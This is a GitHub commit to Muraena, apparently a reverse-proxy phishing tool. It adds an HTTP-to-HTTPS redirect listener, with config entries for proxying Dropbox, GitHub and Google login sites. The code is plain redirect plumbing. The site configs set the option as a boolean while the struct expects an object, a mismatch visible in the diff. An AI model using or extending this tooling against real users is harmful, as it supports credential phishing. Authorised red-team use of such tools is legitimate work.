new: add support for redirecting HTTP to HTTPS #29

muraenateam · Jul 27, 2020 · c3fbb85 · c3fbb85
1 parent ee15c6c
commit c3fbb85
Show file tree

Hide file tree

Showing 7 changed files with 36 additions and 5 deletions.
diff --git a/config/config.json b/config/config.json
@@ -5,7 +5,11 @@
 
     "listener": {
       "ip": "0.0.0.0",
-      "port": 443,
+      "port": 8443,
+      "HTTPtoHTTPS": {
+        "enabled": true,
+        "HTTPport": 8080
+      }
     },
 
     "skipContentType": [

diff --git a/config/dropbox.json b/config/dropbox.json
@@ -6,6 +6,7 @@
     "listener": {
       "ip": "0.0.0.0",
       "port": 443,
+      "HTTPtoHTTPS": true
     },
 
     "skipContentType": [

diff --git a/config/github.com.json b/config/github.com.json
@@ -6,6 +6,7 @@
     "listener": {
       "ip": "0.0.0.0",
       "port": 443,
+      "HTTPtoHTTPS": true
     },
 
     "skipContentType": [

diff --git a/config/google.com.json b/config/google.com.json
@@ -6,6 +6,7 @@
     "listener": {
       "ip": "0.0.0.0",
       "port": 443,
+      "HTTPtoHTTPS": true
     },
 
     "skipContentType": [

diff --git a/main.go b/main.go
@@ -101,9 +101,6 @@ func main() {
 		s.HandleFood(w, r)
 	})
 
-
-
-
 	listeningAddress := fmt.Sprintf("%s:%d", sess.Config.Proxy.Listener.IP, sess.Config.Proxy.Listener.Port)
 	lline := fmt.Sprintf("Muraena is alive on %s\n[ %s ] ==> [ %s ]", tui.Green(listeningAddress),
 		tui.Yellow(sess.Config.Proxy.Phishing), tui.Green(sess.Config.Proxy.Target))
@@ -116,6 +113,12 @@ func main() {
 			CertPool: sess.Config.TLS.Root,
 		}
 
+		if sess.Config.Proxy.Listener.HTTPtoHTTPS.Enabled {
+			// redirect HTTP > HTTPS
+			listingHTTP := fmt.Sprintf("%s:%d", sess.Config.Proxy.Listener.IP, sess.Config.Proxy.Listener.HTTPtoHTTPS.HTTPport)
+			go http.ListenAndServe(listingHTTP, proxy.RedirectToHTTPS(sess.Config.Proxy.Listener.Port))
+		}
+
 		if err := tlsServer.ServeTLS(listeningAddress); err != nil {
 			log.Fatal("Error binding Muraena on HTTPS: %s", err)
 		}
@@ -126,5 +129,4 @@ func main() {
 		}
 	}
 
-
 }
diff --git a/proxy/handler.go b/proxy/handler.go
@@ -7,6 +7,7 @@ import (
 	"io/ioutil"
 	"net/http"
 	"net/url"
+	"regexp"
 	"strconv"
 	"strings"
 
@@ -45,6 +46,23 @@ type SessionType struct {
 	Replacer *Replacer
 }
 
+func RedirectToHTTPS(port int) http.HandlerFunc {
+
+	return func(w http.ResponseWriter, req *http.Request) {
+
+		var re = regexp.MustCompile(`(:\d+)$`)
+		host := re.ReplaceAllString(req.Host, "")
+
+		newURL := fmt.Sprintf("https://%s%s", host, req.URL.String())
+		if port != 443 {
+			newURL = fmt.Sprintf("https://%s:%d%s", host, port, req.URL.String())
+		}
+
+		log.Info("Redirecting HTTP to HTTPS: %s", newURL)
+		http.Redirect(w, req, newURL, http.StatusMovedPermanently)
+	}
+}
+
 func (muraena *MuraenaProxy) RequestBodyProcessor(request *http.Request, track *tracking.Trace, base64 Base64) (err error) {
 	if request.Body != nil {
 

diff --git a/session/config.go b/session/config.go
@@ -28,6 +28,10 @@ type Configuration struct {
 		Listener struct {
 			IP          string `json:"IP"`
 			Port        int    `json:"port"`
+			HTTPtoHTTPS struct {
+				Enabled  bool `json:"enabled"`
+				HTTPport int  `json:"HTTPport"`
+			} `json:"HTTPtoHTTPS"`
 		} `json:"listener"`
 
 		SkipContentType []string `json:"skipContentType"`